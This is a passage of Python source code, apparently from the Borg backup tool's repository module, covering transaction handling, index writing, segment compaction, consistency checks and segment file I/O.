return NSIndex.read(fd)
except (ValueError, OSError, FileIntegrityError) as exc:
logger.warning('Repository index missing or corrupted, trying to recover from: %s', exc)
os.unlink(index_path)
if not auto_recover:
raise
self.prepare_txn(self.get_transaction_id())
# don't leave an open transaction around
self.commit()
return self.open_index(self.get_transaction_id())
def prepare_txn(self, transaction_id, do_cleanup=True):
self._active_txn = True
if self.do_lock and not self.lock.got_exclusive_lock():
if self.exclusive is not None:
# self.exclusive is either True or False, thus a new client is active here.
# if it is False and we get here, the caller did not use exclusive=True although
# it is needed for a write operation. if it is True and we get here, something else
# went very wrong, because we should have an exclusive lock, but we don't.
raise AssertionError("bug in code, exclusive lock should exist here")
# if we are here, this is an old client talking to a new server (expecting lock upgrade).
# or we are replaying segments and might need a lock upgrade for that.
try:
self.lock.upgrade()
except (LockError, LockErrorT):
# if upgrading the lock to exclusive fails, we do not have an
# active transaction. this is important for "serve" mode, where
# the repository instance lives on - even if exceptions happened.
self._active_txn = False
raise
if not self.index or transaction_id is None:
try:
self.index = self.open_index(transaction_id, auto_recover=False)
except (ValueError, OSError, FileIntegrityError) as exc:
logger.warning('Checking repository transaction due to previous error: %s', exc)
self.check_transaction()
self.index = self.open_index(transaction_id, auto_recover=False)
if transaction_id is None:
self.segments = {} # XXX bad name: usage_count_of_segment_x = self.segments[x]
self.compact = FreeSpace() # XXX bad name: freeable_space_of_segment_x = self.compact[x]
self.storage_quota_use = 0
self.shadow_index.clear()
else:
if do_cleanup:
self.io.cleanup(transaction_id)
hints_path = os.path.join(self.path, 'hints.%d' % transaction_id)
index_path = os.path.join(self.path, 'index.%d' % transaction_id)
integrity_data = self._read_integrity(transaction_id, b'hints')
try:
with IntegrityCheckedFile(hints_path, write=False, integrity_data=integrity_data) as fd:
hints = msgpack.unpack(fd)
except (msgpack.UnpackException, msgpack.ExtraData, FileNotFoundError, FileIntegrityError) as e:
logger.warning('Repository hints file missing or corrupted, trying to recover: %s', e)
if not isinstance(e, FileNotFoundError):
os.unlink(hints_path)
# index must exist at this point
os.unlink(index_path)
self.check_transaction()
self.prepare_txn(transaction_id)
return
if hints[b'version'] == 1:
logger.debug('Upgrading from v1 hints.%d', transaction_id)
self.segments = hints[b'segments']
self.compact = FreeSpace()
self.storage_quota_use = 0
for segment in sorted(hints[b'compact']):
logger.debug('Rebuilding sparse info for segment %d', segment)
self._rebuild_sparse(segment)
logger.debug('Upgrade to v2 hints complete')
elif hints[b'version'] != 2:
raise ValueError('Unknown hints file version: %d' % hints[b'version'])
else:
self.segments = hints[b'segments']
self.compact = FreeSpace(hints[b'compact'])
self.storage_quota_use = hints.get(b'storage_quota_use', 0)
self.log_storage_quota()
# Drop uncommitted segments in the shadow index
for key, shadowed_segments in self.shadow_index.items():
for segment in list(shadowed_segments):
if segment > transaction_id:
shadowed_segments.remove(segment)
def write_index(self):
def flush_and_sync(fd):
fd.flush()
os.fsync(fd.fileno())
def rename_tmp(file):
os.rename(file + '.tmp', file)
hints = {
b'version': 2,
b'segments': self.segments,
b'compact': self.compact,
b'storage_quota_use': self.storage_quota_use,
}
integrity = {
# Integrity version started at 2, the current hints version.
# Thus, integrity version == hints version, for now.
b'version': 2,
}
transaction_id = self.io.get_segments_transaction_id()
assert transaction_id is not None
# Log transaction in append-only mode
if self.append_only:
with open(os.path.join(self.path, 'transactions'), 'a') as log:
print('transaction %d, UTC time %s' % (
transaction_id, datetime.utcnow().strftime(ISO_FORMAT)), file=log)
# Write hints file
hints_name = 'hints.%d' % transaction_id
hints_file = os.path.join(self.path, hints_name)
with IntegrityCheckedFile(hints_file + '.tmp', filename=hints_name, write=True) as fd:
msgpack.pack(hints, fd)
flush_and_sync(fd)
integrity[b'hints'] = fd.integrity_data
# Write repository index
index_name = 'index.%d' % transaction_id
index_file = os.path.join(self.path, index_name)
with IntegrityCheckedFile(index_file + '.tmp', filename=index_name, write=True) as fd:
# XXX: Consider using SyncFile for index write-outs.
self.index.write(fd)
flush_and_sync(fd)
integrity[b'index'] = fd.integrity_data
# Write integrity file, containing checksums of the hints and index files
integrity_name = 'integrity.%d' % transaction_id
integrity_file = os.path.join(self.path, integrity_name)
with open(integrity_file + '.tmp', 'wb') as fd:
msgpack.pack(integrity, fd)
flush_and_sync(fd)
# Rename the integrity file first
rename_tmp(integrity_file)
sync_dir(self.path)
# Rename the others after the integrity file is hypothetically on disk
rename_tmp(hints_file)
rename_tmp(index_file)
sync_dir(self.path)
# Remove old auxiliary files
current = '.%d' % transaction_id
for name in os.listdir(self.path):
if not name.startswith(('index.', 'hints.', 'integrity.')):
continue
if name.endswith(current):
continue
os.unlink(os.path.join(self.path, name))
self.index = None
def check_free_space(self):
"""Pre-commit check for sufficient free space to actually perform the commit."""
# As a baseline we take four times the current (on-disk) index size.
# At this point the index may only be updated by compaction, which won't resize it.
# We still apply a factor of four so that a later, separate invocation can free space
# (journaling all deletes for all chunks is one index size) or still make minor additions
# (which may grow the index up to twice its current size).
# Note that in a subsequent operation the committed index is still on-disk, therefore we
# arrive at index_size * (1 + 2 + 1).
# In that order: journaled deletes (1), hashtable growth (2), persisted index (1).
required_free_space = self.index.size() * 4
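# For example (hypothetical numbers): a 100 MiB on-disk index leads to ~400 MiB required here.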
# Conservatively estimate hints file size:
# 10 bytes for each segment-refcount pair, 10 bytes for each segment-space pair
# Assume maximum of 5 bytes per integer. Segment numbers will usually be packed more densely (1-3 bytes),
# as will refcounts and free space integers. For 5 MiB segments this estimate is good to ~20 PB repo size.
# Add 4K to generously account for constant format overhead.
hints_size = len(self.segments) * 10 + len(self.compact) * 10 + 4096
required_free_space += hints_size
required_free_space += self.additional_free_space
if not self.append_only:
full_segment_size = self.max_segment_size + MAX_OBJECT_SIZE
if len(self.compact) < 10:
# This is mostly for the test suite to avoid overestimated free space needs. This can be annoying
# if TMP is a small-ish tmpfs.
compact_working_space = 0
for segment, free in self.compact.items():
try:
compact_working_space += self.io.segment_size(segment) - free
except FileNotFoundError:
# looks like self.compact is referring to a non-existent segment file, ignore it.
pass
logger.debug('check_free_space: few segments, not requiring a full free segment')
compact_working_space = min(compact_working_space, full_segment_size)
logger.debug('check_free_space: calculated working space for compact as %d bytes', compact_working_space)
required_free_space += compact_working_space
else:
# Keep one full worst-case segment free in non-append-only mode
required_free_space += full_segment_size
try:
st_vfs = os.statvfs(self.path)
except OSError as os_error:
logger.warning('Failed to check free space before committing: ' + str(os_error))
return
# f_bavail: even as root - don't touch the Federal Block Reserve!
free_space = st_vfs.f_bavail * st_vfs.f_frsize
logger.debug('check_free_space: required bytes {}, free bytes {}'.format(required_free_space, free_space))
if free_space < required_free_space:
if self.created:
logger.error('Not enough free space to initialize repository at this location.')
self.destroy()
else:
self._rollback(cleanup=True)
formatted_required = format_file_size(required_free_space)
formatted_free = format_file_size(free_space)
raise self.InsufficientFreeSpaceError(formatted_required, formatted_free)
def log_storage_quota(self):
if self.storage_quota:
logger.info('Storage quota: %s out of %s used.',
format_file_size(self.storage_quota_use), format_file_size(self.storage_quota))
def compact_segments(self):
"""Compact sparse segments by copying data into new segments
"""
if not self.compact:
return
index_transaction_id = self.get_index_transaction_id()
segments = self.segments
unused = [] # list of segments, that are not used anymore
logger = create_logger('borg.debug.compact_segments')
def complete_xfer(intermediate=True):
# complete the current transfer (when some target segment is full)
nonlocal unused
# commit the new, compact, used segments
segment = self.io.write_commit(intermediate=intermediate)
logger.debug('complete_xfer: wrote %scommit at segment %d', 'intermediate ' if intermediate else '', segment)
# get rid of the old, sparse, unused segments. free space.
for segment in unused:
logger.debug('complete_xfer: deleting unused segment %d', segment)
count = self.segments.pop(segment)
assert count == 0, 'Corrupted segment reference count - corrupted index or hints'
self.io.delete_segment(segment)
del self.compact[segment]
unused = []
logger.debug('compaction started.')
pi = ProgressIndicatorPercent(total=len(self.compact), msg='Compacting segments %3.0f%%', step=1,
msgid='repository.compact_segments')
for segment, freeable_space in sorted(self.compact.items()):
if not self.io.segment_exists(segment):
logger.warning('segment %d not found, but listed in compaction data', segment)
del self.compact[segment]
pi.show()
continue
segment_size = self.io.segment_size(segment)
if segment_size > 0.2 * self.max_segment_size and freeable_space < 0.15 * segment_size:
logger.debug('not compacting segment %d (only %d bytes are sparse)', segment, freeable_space)
pi.show()
continue
segments.setdefault(segment, 0)
logger.debug('compacting segment %d with usage count %d and %d freeable bytes',
segment, segments[segment], freeable_space)
for tag, key, offset, data in self.io.iter_objects(segment, include_data=True):
if tag == TAG_COMMIT:
continue
in_index = self.index.get(key)
is_index_object = in_index == (segment, offset)
if tag == TAG_PUT and is_index_object:
try:
new_segment, offset = self.io.write_put(key, data, raise_full=True)
except LoggedIO.SegmentFull:
complete_xfer()
new_segment, offset = self.io.write_put(key, data)
self.index[key] = new_segment, offset
segments.setdefault(new_segment, 0)
segments[new_segment] += 1
segments[segment] -= 1
elif tag == TAG_PUT and not is_index_object:
# If this is a PUT shadowed by a later tag, then it will be gone when this segment is deleted after
# this loop. Therefore it is removed from the shadow index.
try:
self.shadow_index[key].remove(segment)
except (KeyError, ValueError):
# do not remove entry with empty shadowed_segments list here,
# it is needed for shadowed_put_exists code (see below)!
pass
elif tag == TAG_DELETE and not in_index:
# If the shadow index doesn't contain this key, then we can't say if there's a shadowed older tag,
# therefore we do not drop the delete, but write it to a current segment.
shadowed_put_exists = key not in self.shadow_index or any(
# If the key is in the shadow index and there is any segment with an older PUT of this
# key, we have a shadowed put.
shadowed < segment for shadowed in self.shadow_index[key])
delete_is_not_stable = index_transaction_id is None or segment > index_transaction_id
if shadowed_put_exists or delete_is_not_stable:
# (introduced in 6425d16aa84be1eaaf88)
# This is needed to avoid object un-deletion if we crash between the commit and the deletion
# of old segments in complete_xfer().
#
# However, this only happens if the crash also affects the FS to the effect that file deletions
# did not materialize consistently after journal recovery. If they always materialize in-order
# then this is not a problem, because the old segment containing a deleted object would be deleted
# before the segment containing the delete.
#
# Consider the following series of operations if we did not do this, i.e. if this entire if-branch
# were removed.
# Columns are segments, lines are different keys (line 1 = some key, line 2 = some other key)
# Legend: P=TAG_PUT, D=TAG_DELETE, c=commit, i=index is written for latest commit
#
# Segment | 1 | 2 | 3
# --------+-------+-----+------
# Key 1 | P | D |
# Key 2 | P | | P
# commits | c i | c | c i
# --------+-------+-----+------
# ^- compact_segments starts
# ^- complete_xfer commits, after that complete_xfer deletes
# segments 1 and 2 (and then the index would be written).
#
# Now we crash. But only segment 2 gets deleted, while segment 1 is still around. Now key 1
# is suddenly undeleted (because the delete in segment 2 is now missing).
# Again, note the requirement here: we delete these in the correct order so that this doesn't happen,
# and it can only happen if the FS materialization of these deletes is reordered or parts are dropped.
# In this case it doesn't cause outright corruption, 'just' an index count mismatch, which will be
# fixed by borg-check --repair.
#
# Note that in this check the index state is the proxy for a "most definitely settled" repository state,
# ie. the assumption is that *all* operations on segments <= index state are completed and stable.
try:
new_segment, size = self.io.write_delete(key, raise_full=True)
except LoggedIO.SegmentFull:
complete_xfer()
new_segment, size = self.io.write_delete(key)
self.compact[new_segment] += size
segments.setdefault(new_segment, 0)
else:
# we did not keep the delete tag for key (see if-branch)
if not self.shadow_index[key]:
# shadowed segments list is empty -> remove it
del self.shadow_index[key]
assert segments[segment] == 0, 'Corrupted segment reference count - corrupted index or hints'
unused.append(segment)
pi.show()
pi.finish()
complete_xfer(intermediate=False)
logger.debug('compaction completed.')
def replay_segments(self, index_transaction_id, segments_transaction_id):
# fake an old client, so that in case we do not have an exclusive lock yet, prepare_txn will upgrade the lock:
remember_exclusive = self.exclusive
self.exclusive = None
self.prepare_txn(index_transaction_id, do_cleanup=False)
try:
segment_count = sum(1 for _ in self.io.segment_iterator())
pi = ProgressIndicatorPercent(total=segment_count, msg='Replaying segments %3.0f%%',
msgid='repository.replay_segments')
for i, (segment, filename) in enumerate(self.io.segment_iterator()):
pi.show(i)
if index_transaction_id is not None and segment <= index_transaction_id:
continue
if segment > segments_transaction_id:
break
objects = self.io.iter_objects(segment)
self._update_index(segment, objects)
pi.finish()
self.write_index()
finally:
self.exclusive = remember_exclusive
self.rollback()
def _update_index(self, segment, objects, report=None):
"""some code shared between replay_segments and check"""
self.segments[segment] = 0
for tag, key, offset, size in objects:
if tag == TAG_PUT:
try:
# If this PUT supersedes an older PUT, mark the old segment for compaction and count the free space
s, _ = self.index[key]
self.compact[s] += size
self.segments[s] -= 1
except KeyError:
pass
self.index[key] = segment, offset
self.segments[segment] += 1
self.storage_quota_use += size
elif tag == TAG_DELETE:
try:
# if the deleted PUT is not in the index, there is nothing to clean up
s, offset = self.index.pop(key)
except KeyError:
pass
else:
if self.io.segment_exists(s):
# the old index is not necessarily valid for this transaction (e.g. compaction); if the segment
# is already gone, then it was already compacted.
self.segments[s] -= 1
size = self.io.read(s, offset, key, read_data=False)
self.storage_quota_use -= size
self.compact[s] += size
elif tag == TAG_COMMIT:
continue
else:
msg = 'Unexpected tag {} in segment {}'.format(tag, segment)
if report is None:
raise self.CheckNeeded(msg)
else:
report(msg)
if self.segments[segment] == 0:
self.compact[segment] += self.io.segment_size(segment)
def _rebuild_sparse(self, segment):
"""Rebuild sparse bytes count for a single segment relative to the current index."""
try:
segment_size = self.io.segment_size(segment)
except FileNotFoundError:
# segment does not exist any more, remove it from the mappings
# note: no need to self.compact.pop(segment), as we start from empty mapping.
self.segments.pop(segment)
return
if self.segments[segment] == 0:
self.compact[segment] = segment_size
return
self.compact[segment] = 0
for tag, key, offset, size in self.io.iter_objects(segment, read_data=False):
if tag == TAG_PUT:
if self.index.get(key, (-1, -1)) != (segment, offset):
# This PUT is superseded later
self.compact[segment] += size
elif tag == TAG_DELETE:
# The outcome of the DELETE has been recorded in the PUT branch already
self.compact[segment] += size
def check(self, repair=False, save_space=False):
"""Check repository consistency
This method verifies all segment checksums and makes sure
the index is consistent with the data stored in the segments.
"""
if self.append_only and repair:
raise ValueError(self.path + " is in append-only mode")
error_found = False
def report_error(msg):
nonlocal error_found
error_found = True
logger.error(msg)
logger.info('Starting repository check')
assert not self._active_txn
try:
transaction_id = self.get_transaction_id()
current_index = self.open_index(transaction_id)
logger.debug('Read committed index of transaction %d', transaction_id)
except Exception as exc:
transaction_id = self.io.get_segments_transaction_id()
current_index = None
logger.debug('Failed to read committed index (%s)', exc)
if transaction_id is None:
logger.debug('No segments transaction found')
transaction_id = self.get_index_transaction_id()
if transaction_id is None:
logger.debug('No index transaction found, trying latest segment')
transaction_id = self.io.get_latest_segment()
if transaction_id is None:
report_error('This repository contains no valid data.')
return False
if repair:
self.io.cleanup(transaction_id)
segments_transaction_id = self.io.get_segments_transaction_id()
logger.debug('Segment transaction is %s', segments_transaction_id)
logger.debug('Determined transaction is %s', transaction_id)
self.prepare_txn(None) # self.index, self.compact, self.segments all empty now!
segment_count = sum(1 for _ in self.io.segment_iterator())
logger.debug('Found %d segments', segment_count)
pi = ProgressIndicatorPercent(total=segment_count, msg='Checking segments %3.1f%%', step=0.1,
msgid='repository.check')
for i, (segment, filename) in enumerate(self.io.segment_iterator()):
pi.show(i)
if segment > transaction_id:
continue
logger.debug('checking segment file %s...', filename)
try:
objects = list(self.io.iter_objects(segment))
except IntegrityError as err:
report_error(str(err))
objects = []
if repair:
self.io.recover_segment(segment, filename)
objects = list(self.io.iter_objects(segment))
self._update_index(segment, objects, report_error)
pi.finish()
# self.index, self.segments, self.compact now reflect the state of the segment files up to <transaction_id>
# We might need to add a commit tag if no committed segment is found
if repair and segments_transaction_id is None:
report_error('Adding commit tag to segment {}'.format(transaction_id))
self.io.segment = transaction_id + 1
self.io.write_commit()
logger.info('Starting repository index check')
if current_index and not repair:
# current_index = "as found on disk"
# self.index = "as rebuilt in-memory from segments"
if len(current_index) != len(self.index):
report_error('Index object count mismatch.')
logger.error('committed index: %d objects', len(current_index))
logger.error('rebuilt index: %d objects', len(self.index))
else:
logger.info('Index object count match.')
line_format = 'ID: %-64s rebuilt index: %-16s committed index: %-16s'
not_found = '<not found>'
for key, value in self.index.iteritems():
current_value = current_index.get(key, not_found)
if current_value != value:
logger.warning(line_format, bin_to_hex(key), value, current_value)
for key, current_value in current_index.iteritems():
if key in self.index:
continue
value = self.index.get(key, not_found)
if current_value != value:
logger.warning(line_format, bin_to_hex(key), value, current_value)
if repair:
self.compact_segments()
self.write_index()
self.rollback()
if error_found:
if repair:
logger.info('Completed repository check, errors found and repaired.')
else:
logger.error('Completed repository check, errors found.')
else:
logger.info('Completed repository check, no problems found.')
return not error_found or repair
def scan_low_level(self):
"""Very low level scan over all segment file entries.
It does NOT care about what's committed and what not.
It does NOT care whether an object might be deleted or superseded later.
It just yields anything it finds in the segment files.
This is intended as a last-resort way to get access to all repo contents of damaged repos,
when there is uncommitted, but valuable data in there...
"""
for segment, filename in self.io.segment_iterator():
try:
for tag, key, offset, data in self.io.iter_objects(segment, include_data=True):
yield key, data, tag, segment, offset
except IntegrityError as err:
logger.error('Segment %d (%s) has IntegrityError(s) [%s] - skipping.' % (segment, filename, str(err)))
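# Illustrative sketch of using scan_low_level() to salvage objects from a damaged repo
# (the `repo` name and the idea of dumping data externally are assumptions, not borg CLI behaviour):
#
#   for key, data, tag, segment, offset in repo.scan_low_level():
#       if tag == TAG_PUT:
#           # e.g. write `data` to some external location for later inspection
#           pass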
def _rollback(self, *, cleanup):
"""
"""
if cleanup:
self.io.cleanup(self.io.get_segments_transaction_id())
self.index = None
self._active_txn = False
self.transaction_doomed = None
def rollback(self):
# note: when used in remote mode, this is time limited, see RemoteRepository.shutdown_time.
self._rollback(cleanup=False)
def __len__(self):
if not self.index:
self.index = self.open_index(self.get_transaction_id())
return len(self.index)
def __contains__(self, id):
if not self.index:
self.index = self.open_index(self.get_transaction_id())
return id in self.index
def list(self, limit=None, marker=None):
"""
list <limit> IDs starting from after id <marker> - in index (pseudo-random) order.
"""
if not self.index:
self.index = self.open_index(self.get_transaction_id())
return [id_ for id_, _ in islice(self.index.iteritems(marker=marker), limit)]
def scan(self, limit=None, marker=None):
"""
list <limit> IDs starting from after id <marker> - in on-disk order, so that a client
fetching data in this order does linear reads and reuses stuff from disk cache.
We rely on repository.check() having run already (either now or some time before) and that:
- if we are called from a borg check command, self.index is a valid, fresh, in-sync repo index.
- if we are called from elsewhere, either self.index or the on-disk index is valid and in-sync.
- the repository segments are valid (no CRC errors).
If we encounter CRC errors in segment entry headers, the rest of the segment is skipped.
"""
if limit is not None and limit < 1:
raise ValueError('please use limit > 0 or limit = None')
if not self.index:
transaction_id = self.get_transaction_id()
self.index = self.open_index(transaction_id)
at_start = marker is None
# smallest valid seg is <uint32> 0, smallest valid offs is <uint32> 8
start_segment, start_offset = (0, 0) if at_start else self.index[marker]
result = []
for segment, filename in self.io.segment_iterator(start_segment):
obj_iterator = self.io.iter_objects(segment, start_offset, read_data=False, include_data=False)
while True:
try:
tag, id, offset, size = next(obj_iterator)
except (StopIteration, IntegrityError):
# either end-of-segment or an error - we can not seek to objects at
# higher offsets than one that has an error in the header fields
break
if start_offset > 0:
# we are using a marker and the marker points to the last object we have already
# returned in the previous scan() call - thus, we need to skip this one object.
# also, for the next segment, we need to start at offset 0.
start_offset = 0
continue
if tag == TAG_PUT and (segment, offset) == self.index.get(id):
# we have found an existing and current object
result.append(id)
if len(result) == limit:
return result
return result
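# Pagination sketch for scan() (illustrative; `repo` and the batch size are assumptions):
#
#   marker = None
#   while True:
#       ids = repo.scan(limit=1000, marker=marker)
#       if not ids:
#           break
#       marker = ids[-1]   # continue right after the last id returned by the previous call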
def get(self, id):
if not self.index:
self.index = self.open_index(self.get_transaction_id())
try:
segment, offset = self.index[id]
return self.io.read(segment, offset, id)
except KeyError:
raise self.ObjectNotFound(id, self.path) from None
def get_many(self, ids, is_preloaded=False):
for id_ in ids:
yield self.get(id_)
def put(self, id, data, wait=True):
"""put a repo object
Note: when doing calls with wait=False this gets async and caller must
deal with async results / exceptions later.
"""
if not self._active_txn:
self.prepare_txn(self.get_transaction_id())
try:
segment, offset = self.index[id]
except KeyError:
pass
else:
# note: doing a delete first will do some bookkeeping.
# we do not want to update the shadow_index here, because
# we know already that we will PUT to this id, so it will
# be in the repo index (and we won't need it in the shadow_index).
self._delete(id, segment, offset, update_shadow_index=False)
segment, offset = self.io.write_put(id, data)
self.storage_quota_use += len(data) + self.io.put_header_fmt.size
self.segments.setdefault(segment, 0)
self.segments[segment] += 1
self.index[id] = segment, offset
if self.storage_quota and self.storage_quota_use > self.storage_quota:
self.transaction_doomed = self.StorageQuotaExceeded(
format_file_size(self.storage_quota), format_file_size(self.storage_quota_use))
raise self.transaction_doomed
def delete(self, id, wait=True):
"""delete a repo object
Note: when doing calls with wait=False this gets async and caller must
deal with async results / exceptions later.
"""
if not self._active_txn:
self.prepare_txn(self.get_transaction_id())
try:
segment, offset = self.index.pop(id)
except KeyError:
raise self.ObjectNotFound(id, self.path) from None
# if we get here, there is an object with this id in the repo,
# we write a DEL here that shadows the respective PUT.
# after the delete, the object is not in the repo index any more,
# for the compaction code, we need to update the shadow_index in this case.
self._delete(id, segment, offset, update_shadow_index=True)
def _delete(self, id, segment, offset, *, update_shadow_index):
# common code used by put and delete
if update_shadow_index:
self.shadow_index.setdefault(id, []).append(segment)
self.segments[segment] -= 1
size = self.io.read(segment, offset, id, read_data=False)
self.storage_quota_use -= size
self.compact[segment] += size
segment, size = self.io.write_delete(id)
self.compact[segment] += size
self.segments.setdefault(segment, 0)
def async_response(self, wait=True):
"""Get one async result (only applies to remote repositories).
async commands (== calls with wait=False, e.g. delete and put) have no results,
but may raise exceptions. These async exceptions must get collected later via
async_response() calls. Repeat the call until it returns None.
The previous calls might either return one (non-None) result or raise an exception.
If wait=True is given and there are outstanding responses, it will wait for them
to arrive. With wait=False, it will only return already received responses.
"""
def preload(self, ids):
"""Preload objects (only applies to remote repositories)
"""
class LoggedIO:
class SegmentFull(Exception):
"""raised when a segment is full, before opening next"""
header_fmt = struct.Struct('<IIB')
assert header_fmt.size == 9
put_header_fmt = struct.Struct('<IIB32s')
assert put_header_fmt.size == 41
header_no_crc_fmt = struct.Struct('<IB')
assert header_no_crc_fmt.size == 5
crc_fmt = struct.Struct('<I')
assert crc_fmt.size == 4
_commit = header_no_crc_fmt.pack(9, TAG_COMMIT)
COMMIT = crc_fmt.pack(crc32(_commit)) + _commit
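# On-disk layout of a segment entry, as implied by the struct formats above (sizes in bytes):
#
#   PUT:    crc32(4) | size(4) | tag(1) | key(32) | data(size - 41)
#   DELETE: crc32(4) | size(4) | tag(1) | key(32)              (size == 41)
#   COMMIT: crc32(4) | size(4) | tag(1)                        (size == 9)
#
# The CRC covers everything after the crc field itself, see write_put()/write_delete()/write_commit().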
def __init__(self, path, limit, segments_per_dir, capacity=90):
self.path = path
self.fds = LRUCache(capacity, dispose=self._close_fd)
self.segment = 0
self.limit = limit
self.segments_per_dir = segments_per_dir
self.offset = 0
self._write_fd = None
self._fds_cleaned = 0
def close(self):
self.close_segment()
self.fds.clear()
self.fds = None # Just to make sure we're disabled
def _close_fd(self, ts_fd):
ts, fd = ts_fd
safe_fadvise(fd.fileno(), 0, 0, 'DONTNEED')
fd.close()
def segment_iterator(self, segment=None, reverse=False):
if segment is None:
segment = 0 if not reverse else 2 ** 32 - 1
data_path = os.path.join(self.path, 'data')
start_segment_dir = segment // self.segments_per_dir
dirs = os.listdir(data_path)
if not reverse:
dirs = [dir for dir in dirs if dir.isdigit() and int(dir) >= start_segment_dir]
else:
dirs = [dir for dir in dirs if dir.isdigit() and int(dir) <= start_segment_dir]
dirs = sorted(dirs, key=int, reverse=reverse)
for dir in dirs:
filenames = os.listdir(os.path.join(data_path, dir))
if not reverse:
filenames = [filename for filename in filenames if filename.isdigit() and int(filename) >= segment]
else:
filenames = [filename for filename in filenames if filename.isdigit() and int(filename) <= segment]
filenames = sorted(filenames, key=int, reverse=reverse)
for filename in filenames:
# Note: Do not filter out logically deleted segments (see "File system interaction" above),
# since this is used by cleanup and txn state detection as well.
yield int(filename), os.path.join(data_path, dir, filename)
def get_latest_segment(self):
for segment, filename in self.segment_iterator(reverse=True):
return segment
return None
def get_segments_transaction_id(self):
"""Return the last committed segment.
"""
for segment, filename in self.segment_iterator(reverse=True):
if self.is_committed_segment(segment):
return segment
return None
def cleanup(self, transaction_id):
"""Delete segment files left by aborted transactions
"""
self.segment = transaction_id + 1
count = 0
for segment, filename in self.segment_iterator(reverse=True):
if segment > transaction_id:
if segment in self.fds:
del self.fds[segment]
truncate_and_unlink(filename)
count += 1
else:
break
logger.debug('Cleaned up %d uncommitted segment files (== everything after segment %d).',
count, transaction_id)
def is_committed_segment(self, segment):
"""Check if segment ends with a COMMIT_TAG tag
"""
try:
iterator = self.iter_objects(segment)
except IntegrityError:
return False
with open(self.segment_filename(segment), 'rb') as fd:
try:
fd.seek(-self.header_fmt.size, os.SEEK_END)
except OSError as e:
# return False if segment file is empty or too small
if e.errno == errno.EINVAL:
return False
raise e
if fd.read(self.header_fmt.size) != self.COMMIT:
return False
seen_commit = False
while True:
try:
tag, key, offset, _ = next(iterator)
except IntegrityError:
return False
except StopIteration:
break
if tag == TAG_COMMIT:
seen_commit = True
continue
if seen_commit:
return False
return seen_commit
def segment_filename(self, segment):
return os.path.join(self.path, 'data', str(segment // self.segments_per_dir), str(segment))
def get_write_fd(self, no_new=False, raise_full=False):
if not no_new and self.offset and self.offset > self.limit:
if raise_full:
raise self.SegmentFull
self.close_segment()
if not self._write_fd:
if self.segment % self.segments_per_dir == 0:
dirname = os.path.join(self.path, 'data', str(self.segment // self.segments_per_dir))
if not os.path.exists(dirname):
os.mkdir(dirname)
sync_dir(os.path.join(self.path, 'data'))
self._write_fd = SyncFile(self.segment_filename(self.segment), binary=True)
self._write_fd.write(MAGIC)
self.offset = MAGIC_LEN
if self.segment in self.fds:
# we may have a cached fd for a segment file we already deleted and
# we are now writing a new segment file to the same file name. get rid
# of the cached fd that still refers to the old file, so it will later
# get repopulated (on demand) with a fd that refers to the new file.
del self.fds[self.segment]
return self._write_fd
def get_fd(self, segment):
# note: get_fd() returns a fd with undefined file pointer position,
# so callers must always seek() to desired position afterwards.
now = time.monotonic()
def open_fd():
fd = open(self.segment_filename(segment), 'rb')
self.fds[segment] = (now, fd)
return fd
def clean_old():
# we regularly get rid of all old FDs here:
if now - self._fds_cleaned > FD_MAX_AGE // 8:
self._fds_cleaned = now
for k, ts_fd in list(self.fds.items()):
ts, fd = ts_fd
if now - ts > FD_MAX_AGE:
# we do not want to touch long-unused file handles to
# avoid ESTALE issues (e.g. on network filesystems).
del self.fds[k]
clean_old()
try:
ts, fd = self.fds[segment]
except KeyError:
fd = open_fd()
else:
# we only have fresh enough stuff here.
# update the timestamp of the lru cache entry.
self.fds.upd(segment, (now, fd))
return fd
def close_segment(self):
# set self._write_fd to None early to guard against reentry from error handling code paths:
fd, self._write_fd = self._write_fd, None
if fd is not None:
self.segment += 1
self.offset = 0
fd.close()
def delete_segment(self, segment):
if segment in self.fds:
del self.fds[segment]
try:
truncate_and_unlink(self.segment_filename(segment))
except FileNotFoundError:
pass
def segment_exists(self, segment):
filename = self.segment_filename(segment)
# When deleting segments, they are first truncated. If truncate(2) and unlink(2) are split
# across FS transactions, then logically deleted segments will show up as truncated.
return os.path.exists(filename) and os.path.getsize(filename)
def segment_size(self, segment):
return os.path.getsize(self.segment_filename(segment))
def get_segment_magic(self, segment):
fd = self.get_fd(segment)
fd.seek(0)
return fd.read(MAGIC_LEN)
def iter_objects(self, segment, offset=0, include_data=False, read_data=True):
"""
Return object iterator for *segment*.
If read_data is False then include_data must be False as well.
Integrity checks are skipped: all data obtained from the iterator must be considered informational.
The iterator returns four-tuples of (tag, key, offset, data|size).
"""
fd = self.get_fd(segment)
fd.seek(offset)
if offset == 0:
# we are touching this segment for the first time, check the MAGIC.
# Repository.scan() calls us with segment > 0 when it continues an ongoing iteration
# from a marker position - but then we have checked the magic before already.
if fd.read(MAGIC_LEN) != MAGIC:
raise IntegrityError('Invalid segment magic [segment {}, offset {}]'.format(segment, 0))
offset = MAGIC_LEN
header = fd.read(self.header_fmt.size)
while header:
size, tag, key, data = self._read(fd, self.header_fmt, header, segment, offset,
(TAG_PUT, TAG_DELETE, TAG_COMMIT),
read_data=read_data)
if include_data:
yield tag, key, offset, data
else:
yield tag, key, offset, size
offset += size
# we must get the fd via get_fd() here again as we yielded to our caller and it might
# have triggered closing of the fd we had before (e.g. by calling io.read() for
# different segment(s)).
# by calling get_fd() here again we also make our fd "recently used" so it likely
# does not get kicked out of self.fds LRUcache.
fd = self.get_fd(segment)
fd.seek(offset)
header = fd.read(self.header_fmt.size)
def recover_segment(self, segment, filename):
logger.info('attempting to recover ' + filename)
if segment in self.fds:
del self.fds[segment]
if os.path.getsize(filename) < MAGIC_LEN + self.header_fmt.size:
# this is either a zero-byte file (which would crash mmap() below) or otherwise
# just too small to be a valid non-empty segment file, so do a shortcut here:
with SaveFile(filename, binary=True) as fd:
fd.write(MAGIC)
return
with SaveFile(filename, binary=True) as dst_fd:
with open(filename, 'rb') as src_fd:
# note: file must not be 0 size or mmap() will crash.
with mmap.mmap(src_fd.fileno(), 0, access=mmap.ACCESS_READ) as mm:
# memoryview context manager is problematic, see https://bugs.python.org/issue35686
data = memoryview(mm)
d = data
try:
dst_fd.write(MAGIC)
while len(d) >= self.header_fmt.size:
crc, size, tag = self.header_fmt.unpack(d[:self.header_fmt.size])
if size < self.header_fmt.size or size > len(d):
d = d[1:]
continue
if crc32(d[4:size]) & 0xffffffff != crc:
d = d[1:]
continue
dst_fd.write(d[:size])
d = d[size:]
finally:
del d
data.release()
def read(self, segment, offset, id, read_data=True):
"""
Read entry from *segment* at *offset* with *id*.
If read_data is False the size of the entry is returned instead and integrity checks are skipped.
The return value should thus be considered informational.
"""
if segment == self.segment and self._write_fd:
